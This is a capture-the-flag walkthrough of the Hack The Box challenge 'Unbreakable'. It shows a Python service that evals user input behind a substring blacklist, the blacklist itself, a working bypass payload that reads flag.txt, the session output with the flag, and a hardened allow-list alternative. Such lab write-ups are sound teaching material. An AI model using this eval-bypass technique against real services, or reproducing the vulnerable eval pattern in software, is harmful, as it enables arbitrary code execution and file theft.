# Unbreakable \[MISC]

### Description:

Think you can escape my grasp? Challenge accepted! I dare you to try and break free, but beware, it won't be easy. I'm ready for whatever tricks you have up your sleeve!

### Misc - 300 points

## <mark style="color:orange;">**Walkthrough**</mark>

We start by downloading the source files.

{% file src="<https://2332894340-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEdOMDo0CmDiko2Wp2e9E%2Fuploads%2FR27CfJUjIO4y5iO8mLdR%2Fmisc_unbreakable.zip?alt=media&token=aa48205c-f0aa-4d80-8dba-119e2eb9ac9e>" %}

We are given a `main.py` file that probably runs on the server. We can connect to the server using `nc 94.237.56.118 35970`.

Looking at the `main.py` file, we see that we can provide input which will be executed via `eval`. Unfortunately, there is a blacklist that prevents us from using certain characters and substrings.

```python
# Excerpt from the challenge's main.py. banner1 and banner2 are ASCII-art strings
# defined earlier in the file and omitted here ('banner' itself is blacklisted).
blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%', 
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's', 
              'lower', 'upper', 'system', '}', '{' ]

while True:
  ans = input('Break me, shake me!\n\n$ ').strip()
  
  # Substring check: any blacklisted token anywhere in the input rejects it.
  if any(char in ans for char in blacklist):
    print(f'\n{banner1}\nNaughty naughty..\n')
  else:
    try:
      # '()' is appended, so the input must evaluate to something callable.
      eval(ans + '()')
      print('WHAT WAS THAT?!\n')
    except:
      # Any exception (including a TypeError from calling a non-callable) lands here.
      print(f"\n{banner2}\nI'm UNBREAKABLE!\n") 
```

Additionally, `()` is appended to the input, so our input must end with something that is callable.

Looking at the blacklist, we see that `print`, `open` and `read` contain none of the blocked substrings, so we can use `print` to output things, `open` to open a file and `read` to read the contents of the file.

We can also use single quotes, so this payload would be valid to read the flag: `open('flag.txt').read`.

This would open the flag file and read its contents. Unfortunately, nothing is printed, so we have to use `print`.

`print(open('flag.txt').read())` doesn't work, because the appended `()` would turn it into `print(open('flag.txt').read())()`; `print` returns `None`, and calling `None` raises a `TypeError`.

Fortunately, `eval` accepts a comma-separated expression, which Python evaluates as a tuple, element by element, so we can use `print(open('flag.txt').read()),print` to print the flag.

This is valid because the appended `()` turns it into `print(open('flag.txt').read()),print()`, a tuple expression whose first element prints the flag and whose second element is a harmless call to `print` with no arguments.
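To see both halves of this reasoning run without touching a real file, the following added example (not part of the challenge's `main.py` or of the original writeup) replays the server's blacklist check and its `eval(ans + '()')` step against stand-in functions: `show` plays the role of `print` (records its arguments, returns `None`) and `secret` plays the role of `open('flag.txt').read()` with a constructed value. It also contrasts the blacklist with an allow-list dispatcher, the shape a service should use instead of evaluating user text at all; `safe_dispatch` and the `show`/`secret` names are assumptions introduced for the illustration.

```python
# Copy of the challenge's blacklist, as shown in main.py above.
BLACKLIST = [';', '"', 'os', '_', '\\', '/', '`',
             ' ', '-', '!', '[', ']', '*', 'import',
             'eval', 'banner', 'echo', 'cat', '%',
             '&', '>', '<', '+', '1', '2', '3', '4',
             '5', '6', '7', '8', '9', '0', 'b', 's',
             'lower', 'upper', 'system', '}', '{']


def is_blocked(ans: str) -> bool:
    """The same substring test the challenge applies to every input line."""
    return any(token in ans for token in BLACKLIST)


def run_challenge_eval(ans: str, namespace: dict):
    """Mimic the server: append '()' and eval the result.

    Builtins are removed and only `namespace` is visible, so the stand-ins
    passed in are the only callables reachable.  Returns (value, None) on
    success or (None, exception class name) on failure, mirroring the server's
    'WHAT WAS THAT?!' and 'UNBREAKABLE' branches without printing banners.
    """
    try:
        return eval(ans + '()', {'__builtins__': {}}, namespace), None
    except Exception as exc:  # the server uses a bare except here
        return None, type(exc).__name__


def demo_comma_trick():
    """Contrast 'show(secret())' with 'show(secret()),show' under the appended '()'.

    `show` stands in for print (records arguments, returns None); `secret`
    stands in for open('flag.txt').read() and returns a constructed value.
    """
    calls = []

    def show(*values):
        calls.append(values)

    def secret():
        return 'FLAG{constructed-sample}'  # constructed, not a real flag

    ns = {'show': show, 'secret': secret}

    # 'show(secret())' + '()' -> show(...) returns None, then None() raises TypeError
    _, err_single = run_challenge_eval("show(secret())", ns)

    # 'show(secret()),show' + '()' -> the comma builds a tuple: element one is the
    # call we want, element two is show() with no arguments, which is harmless
    value, err_tuple = run_challenge_eval("show(secret()),show", ns)

    return err_single, err_tuple, value, calls


def filter_verdicts():
    """What the blacklist does and does not stop for three sample inputs."""
    return {
        "print(open('flag.txt').read()),print":
            is_blocked("print(open('flag.txt').read()),print"),  # passes
        'import os': is_blocked('import os'),                    # blocked
        'print(1)': is_blocked('print(1)'),                      # digits blocked
    }


def safe_dispatch(ans: str, commands: dict):
    """Hardened alternative (hypothetical): never eval user text.

    `commands` maps exact command names to zero-argument callables chosen by
    the service author.  Anything not in the allow-list is refused before any
    code runs, so there is no filter to bypass.
    """
    handler = commands.get(ans.strip())
    if handler is None:
        return None, 'rejected'
    return handler(), None
```

`demo_comma_trick()` returns `('TypeError', None, (None, None), [...])`: the single call fails with `TypeError`, the tuple form succeeds, and the recorded calls show `secret`'s value reaching `show` followed by an empty `show()`. The substring blacklist is the weak setting here; `safe_dispatch` replaces it with an exact-match allow-list, which is the design choice that removes the problem rather than patching symptoms.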

### Connecting to the server and providing this input gives us the flag:

```sh
┌── 👽AKUMA 🥷 ➤➤ 🌐10.10.0.12
├──[   ~/Desktop/CTF/hackerroyale]
└─ ⚔ nc 94.237.56.118 35970
Break me, shake me!

$ print(open('flag.txt').read()),print
HTB{3v4l_0r_3vuln??}


WHAT WAS THAT?!

Break me, shake me!

$
```
